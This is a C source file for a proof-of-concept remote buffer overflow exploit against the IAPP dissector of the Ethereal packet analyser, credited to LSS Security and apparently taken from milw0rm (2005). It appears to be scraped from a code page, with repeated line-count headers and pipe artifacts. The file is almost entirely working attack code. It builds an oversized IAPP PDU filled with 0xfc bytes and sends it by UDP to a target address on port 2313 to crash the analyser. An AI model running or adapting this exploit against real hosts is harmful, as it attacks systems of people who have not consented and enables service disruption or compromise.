83 lines
No EOL
1.6 KiB
C++
83 lines
No EOL
1.6 KiB
C++
/*
|
|
*
|
|
* Ethereal IAPP remote buffer overflow #2 PoC exploit
|
|
* ---------------------------------------------------
|
|
* To test this vulnerability on windows, try to send 3-10 packets
|
|
* that will trigger the crash, and scroll between captured packets
|
|
* in Ethereal.
|
|
*
|
|
* Coded by Leon Juranic <ljuranic@lss.hr>
|
|
* LSS Security <http://security.lss.hr/en/>
|
|
*
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <windows.h>
|
|
|
|
#pragma comment (lib,"ws2_32")
|
|
|
|
#define IAPP_PDU_SSID 0
|
|
|
|
typedef struct _e_iapphdr {
|
|
unsigned char ia_version;
|
|
unsigned char ia_type;
|
|
} e_iapphdr;
|
|
|
|
|
|
typedef struct _e_pduhdr {
|
|
unsigned char pdu_type;
|
|
unsigned char pdu_len_h;
|
|
unsigned char pdu_len_l;
|
|
} e_pduhdr;
|
|
|
|
|
|
void xp_sendpacket (char *pack)
|
|
{
|
|
WORD wVersionRequested;
|
|
WSADATA wsaData;
|
|
int err;
|
|
int sock,i;
|
|
struct sockaddr_in sin;
|
|
unsigned char buf[2000];
|
|
char bla[2000];
|
|
e_iapphdr *iapp;
|
|
e_pduhdr *pdu;
|
|
|
|
wVersionRequested = MAKEWORD( 2, 2 );
|
|
err = WSAStartup( wVersionRequested, &wsaData );
|
|
if ( err != 0 ) {
|
|
printf ("error!!!\n");
|
|
ExitProcess(-1);
|
|
}
|
|
|
|
sock=socket(AF_INET,SOCK_DGRAM,0);
|
|
|
|
sin.sin_family=AF_INET;
|
|
sin.sin_addr.s_addr = inet_addr(pack);
|
|
sin.sin_port = htons(2313);
|
|
|
|
iapp = (e_iapphdr*)&buf;
|
|
iapp->ia_version = 1;
|
|
iapp->ia_type = 1;
|
|
|
|
pdu = (e_pduhdr*)(buf+2);
|
|
pdu->pdu_type = 3;
|
|
pdu->pdu_len_h = 0x05;
|
|
pdu->pdu_len_l = 0xa1;
|
|
|
|
memset (bla,'\xfc',1300);
|
|
strncpy ((char*)&buf+sizeof(e_iapphdr)+sizeof(e_pduhdr),bla,2000);
|
|
|
|
// for (i=0;i<1000;i++)
|
|
sendto (sock,(char*)buf,1489,0,(struct sockaddr*)&sin,sizeof(struct sockaddr));
|
|
|
|
}
|
|
|
|
|
|
main (int argc, char **argv)
|
|
{
|
|
|
|
xp_sendpacket(argv[1]);
|
|
}
|
|
|
|
// milw0rm.com [2005-03-12]
|